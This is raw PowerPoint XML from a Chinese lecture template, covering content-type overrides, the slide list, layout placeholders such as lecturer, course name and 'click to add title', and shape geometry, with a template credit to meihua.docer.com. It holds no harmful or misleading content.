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notesSlides/notesSlide8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide10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1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2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3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4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag56.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag57.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag58.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide17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8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag66.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag67.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide20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1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22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag85.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag86.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag87.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide25.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag88.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag89.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag90.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide28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29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30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31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32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33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34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35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag119.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide36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37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38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39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40.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag157.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide41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256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="285" r:id="rId4"/>
    <p:sldId id="290" r:id="rId5"/>
    <p:sldId id="316" r:id="rId6"/>
    <p:sldId id="318" r:id="rId7"/>
    <p:sldId id="320" r:id="rId8"/>
    <p:sldId id="323" r:id="rId9"/>
    <p:sldId id="324" r:id="rId10"/>
    <p:sldId id="419" r:id="rId11"/>
    <p:sldId id="338" r:id="rId12"/>
    <p:sldId id="346" r:id="rId13"/>
    <p:sldId id="342" r:id="rId14"/>
    <p:sldId id="343" r:id="rId15"/>
    <p:sldId id="344" r:id="rId16"/>
    <p:sldId id="345" r:id="rId17"/>
    <p:sldId id="337" r:id="rId18"/>
    <p:sldId id="339" r:id="rId19"/>
    <p:sldId id="340" r:id="rId20"/>
    <p:sldId id="352" r:id="rId21"/>
    <p:sldId id="355" r:id="rId22"/>
    <p:sldId id="354" r:id="rId23"/>
    <p:sldId id="356" r:id="rId24"/>
    <p:sldId id="542" r:id="rId25"/>
    <p:sldId id="357" r:id="rId26"/>
    <p:sldId id="536" r:id="rId27"/>
    <p:sldId id="539" r:id="rId28"/>
    <p:sldId id="540" r:id="rId29"/>
    <p:sldId id="543" r:id="rId30"/>
    <p:sldId id="534" r:id="rId31"/>
    <p:sldId id="655" r:id="rId32"/>
    <p:sldId id="656" r:id="rId33"/>
    <p:sldId id="371" r:id="rId34"/>
    <p:sldId id="393" r:id="rId35"/>
    <p:sldId id="395" r:id="rId36"/>
    <p:sldId id="420" r:id="rId37"/>
    <p:sldId id="418" r:id="rId38"/>
    <p:sldId id="490" r:id="rId39"/>
    <p:sldId id="423" r:id="rId40"/>
    <p:sldId id="424" r:id="rId41"/>
    <p:sldId id="426" r:id="rId42"/>
    <p:sldId id="428" r:id="rId43"/>
    <p:sldId id="430" r:id="rId44"/>
    <p:sldId id="429" r:id="rId45"/>
    <p:sldId id="381" r:id="rId46"/>
    <p:sldId id="431" r:id="rId47"/>
    <p:sldId id="433" r:id="rId48"/>
    <p:sldId id="432" r:id="rId49"/>
    <p:sldId id="434" r:id="rId50"/>
    <p:sldId id="464" r:id="rId51"/>
    <p:sldId id="465" r:id="rId52"/>
    <p:sldId id="466" r:id="rId53"/>
    <p:sldId id="467" r:id="rId54"/>
    <p:sldId id="468" r:id="rId55"/>
    <p:sldId id="469" r:id="rId56"/>
    <p:sldId id="470" r:id="rId57"/>
    <p:sldId id="483" r:id="rId58"/>
    <p:sldId id="484" r:id="rId59"/>
    <p:sldId id="485" r:id="rId60"/>
    <p:sldId id="471" r:id="rId61"/>
    <p:sldId id="407" r:id="rId62"/>
    <p:sldId id="486" r:id="rId63"/>
    <p:sldId id="487" r:id="rId64"/>
    <p:sldId id="489" r:id="rId65"/>
    <p:sldId id="696" r:id="rId66"/>
    <p:sldId id="488" r:id="rId67"/>
    <p:sldId id="383" r:id="rId68"/>
    <p:sldId id="491" r:id="rId69"/>
    <p:sldId id="492" r:id="rId70"/>
    <p:sldId id="493" r:id="rId71"/>
    <p:sldId id="495" r:id="rId72"/>
    <p:sldId id="705" r:id="rId73"/>
    <p:sldId id="707" r:id="rId74"/>
    <p:sldId id="698" r:id="rId75"/>
    <p:sldId id="259" r:id="rId76"/>
  </p:sldIdLst>
  <p:sldSz cx="11522075" cy="6480175"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="zh-CN"/>
    </a:defPPr>
    <a:lvl1pPr marL="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435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2870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305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5740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175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8610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0045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14165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7800"/>
    <a:srgbClr val="8EAED4"/>
    <a:srgbClr val="01437C"/>
    <a:srgbClr val="353535"/>
    <a:srgbClr val="2A2A2A"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="5978B1"/>
    <a:srgbClr val="92410D"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="DF8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1"/>
    <p:restoredTop sz="94606"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="-1920" y="-1002"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2106"/>
        <p:guide pos="360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928" y="-84"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2971"/>
        <p:guide pos="214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smtClean="0"/>
              <a:t>讲师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XXX《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>课程名称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B8E2C-225B-43D0-9255-FD76346D59FC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smtClean="0"/>
              <a:t>讲师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XXX《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>课程名称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F6287-3952-446F-9742-1E53908F8F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5993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smtClean="0"/>
              <a:t>讲师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XXX《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>课程名称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751A1-F057-4CD7-B3D0-663A5894C4B0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smtClean="0"/>
              <a:t>讲师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XXX《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>课程名称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C3829-85C2-4C78-A748-3A4999477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0621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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模板来自于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://meihua.docer.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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  <a:t>3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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>26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609EA-4ED7-458E-841A-D6436E22768C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609EA-4ED7-458E-841A-D6436E22768C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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模板来自于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://meihua.docer.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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  <a:t>31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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模板来自于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://meihua.docer.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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  <a:t>33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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>34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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>35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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>36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609EA-4ED7-458E-841A-D6436E22768C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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>40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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模板来自于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://meihua.docer.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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  <a:t>5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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>41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609EA-4ED7-458E-841A-D6436E22768C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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模板来自于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://meihua.docer.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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  <a:t>45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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>46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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>47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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>48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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>49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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>50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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>51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609EA-4ED7-458E-841A-D6436E22768C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609EA-4ED7-458E-841A-D6436E22768C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609EA-4ED7-458E-841A-D6436E22768C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609EA-4ED7-458E-841A-D6436E22768C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609EA-4ED7-458E-841A-D6436E22768C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609EA-4ED7-458E-841A-D6436E22768C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609EA-4ED7-458E-841A-D6436E22768C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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>59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609EA-4ED7-458E-841A-D6436E22768C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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模板来自于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://meihua.docer.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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  <a:t>61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609EA-4ED7-458E-841A-D6436E22768C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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模板来自于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://meihua.docer.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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  <a:t>67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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>68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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模板来自于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://meihua.docer.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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  <a:t>72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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>20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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>21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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>22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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>24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1080E2-28CB-4D25-B7ED-EACE66A710AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr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9060" cy="648017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64493" y="989120"/>
            <a:ext cx="7993062" cy="72008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 smtClean="0"/>
              <a:t>单击此处添加标题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864493" y="1727919"/>
            <a:ext cx="7343775" cy="50375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 smtClean="0"/>
              <a:t>单击此处编辑文字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864493" y="2827356"/>
            <a:ext cx="3167062" cy="28835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 smtClean="0"/>
              <a:t>年／月／日</a:t>
            </a:r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11" y="5473724"/>
            <a:ext cx="1609888" cy="4931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36680" cy="6480175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648469" y="503783"/>
            <a:ext cx="1152128" cy="64772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2838044" y="1439887"/>
            <a:ext cx="550702" cy="43150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3389415" y="1439887"/>
            <a:ext cx="3883789" cy="43150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 smtClean="0"/>
              <a:t>单击此处添加标题</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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1975555"/>
            <a:ext cx="550702" cy="40043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3388746" y="1975555"/>
            <a:ext cx="3884458" cy="400436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 smtClean="0"/>
              <a:t>单击此处添加标题</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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2838044" y="2511225"/>
            <a:ext cx="550702" cy="40921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6" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2838044" y="3046894"/>
            <a:ext cx="550702" cy="40921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7" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2841891" y="3582565"/>
            <a:ext cx="546855" cy="3603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 smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38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3391093" y="2511225"/>
            <a:ext cx="3882111" cy="409215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 smtClean="0"/>
              <a:t>单击此处添加标题</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="文本占位符 30"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3391094" y="3046894"/>
            <a:ext cx="3882110" cy="409217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 smtClean="0"/>
              <a:t>单击此处添加标题</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="文本占位符 33"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388746" y="3582565"/>
            <a:ext cx="3884458" cy="360362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 smtClean="0"/>
              <a:t>单击此处添加标题</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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469" y="5688359"/>
            <a:ext cx="1297013" cy="3969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453" y="503783"/>
            <a:ext cx="6120680" cy="6477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200" b="1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 smtClean="0"/>
              <a:t>单击此处添加标题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504453" y="5874186"/>
            <a:ext cx="1728192" cy="318229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 smtClean="0"/>
              <a:t>讲师</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XXX 《</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>课程名称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469" y="5688359"/>
            <a:ext cx="1297013" cy="3969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9060" cy="648017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864493" y="1079847"/>
            <a:ext cx="5329238" cy="80664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4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 smtClean="0"/>
              <a:t>感谢您的时间。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/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864493" y="1877580"/>
            <a:ext cx="5329238" cy="570420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0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THANKS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.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469" y="5688360"/>
            <a:ext cx="1296038" cy="3969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SO_FD"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792143" y="6006162"/>
            <a:ext cx="2592467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E209CE7-C191-49CB-93DE-563C8614E8C5}" type="datetimeFigureOut">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="0" i="0" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2019/1/23</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" b="0" i="0" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204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11" name="KSO_FT"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3816687" y="6006162"/>
            <a:ext cx="388870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>
              <a:latin typeface="Arial" panose="020B0604020202020204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12" name="KSO_FN"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8137465" y="6006162"/>
            <a:ext cx="2592467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31067DD-7756-4DF3-904A-8F40BA684AA6}" type="slidenum">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="0" i="0" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" b="0" i="0" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0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9278" y="2081578"/>
            <a:ext cx="4049183" cy="1273450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="7560">
                <a:solidFill>
                  <a:schemeClr val="accent2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2143" y="6006162"/>
            <a:ext cx="2592467" cy="345009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7DEA9DE6-ED54-4C9D-8765-7671D1A2B870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9E7C9-9825-4CAE-AE98-C04501B8328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 flipV="1">
            <a:off x="9404206" y="3112997"/>
            <a:ext cx="2117867" cy="706896"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 949233"/>
              <a:gd name="connsiteX1" fmla="*/ 1672048 w 1672048"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 949233"/>
              <a:gd name="connsiteX2" fmla="*/ 1672048 w 1672048"/>
              <a:gd name="connsiteY2" fmla="*/ 949233 h 949233"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY3" fmla="*/ 949233 h 949233"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 949233"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY0-2" fmla="*/ 235132 h 1184365"/>
              <a:gd name="connsiteX1-3" fmla="*/ 1672048 w 1672048"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 1184365"/>
              <a:gd name="connsiteX2-5" fmla="*/ 1672048 w 1672048"/>
              <a:gd name="connsiteY2-6" fmla="*/ 1184365 h 1184365"/>
              <a:gd name="connsiteX3-7" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1184365 h 1184365"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY4-10" fmla="*/ 235132 h 11843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672048" h="1184365">
                <a:moveTo>
                  <a:pt x="0" y="235132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1672048" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1672048" y="1184365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1184365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23513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446" tIns="18223" rIns="36446" bIns="1822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720"/>
          </a:p>
        </p:txBody>
      </p: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" y="2546444"/>
            <a:ext cx="3599275" cy="561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446" tIns="18223" rIns="36446" bIns="1822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720">
              <a:solidFill>
                <a:srgbClr val="00C530"/>
              </a:solidFill>
            </a:endParaRPr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2" y="3107802"/>
            <a:ext cx="3599275" cy="561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446" tIns="18223" rIns="36446" bIns="1822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720"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9404208" y="2406104"/>
            <a:ext cx="2117867" cy="706896"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 949233"/>
              <a:gd name="connsiteX1" fmla="*/ 1672048 w 1672048"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 949233"/>
              <a:gd name="connsiteX2" fmla="*/ 1672048 w 1672048"/>
              <a:gd name="connsiteY2" fmla="*/ 949233 h 949233"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY3" fmla="*/ 949233 h 949233"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 949233"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY0-2" fmla="*/ 235132 h 1184365"/>
              <a:gd name="connsiteX1-3" fmla="*/ 1672048 w 1672048"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 1184365"/>
              <a:gd name="connsiteX2-5" fmla="*/ 1672048 w 1672048"/>
              <a:gd name="connsiteY2-6" fmla="*/ 1184365 h 1184365"/>
              <a:gd name="connsiteX3-7" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1184365 h 1184365"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 1672048"/>
              <a:gd name="connsiteY4-10" fmla="*/ 235132 h 11843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672048" h="1184365">
                <a:moveTo>
                  <a:pt x="0" y="235132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1672048" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1672048" y="1184365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1184365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23513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446" tIns="18223" rIns="36446" bIns="1822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720"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
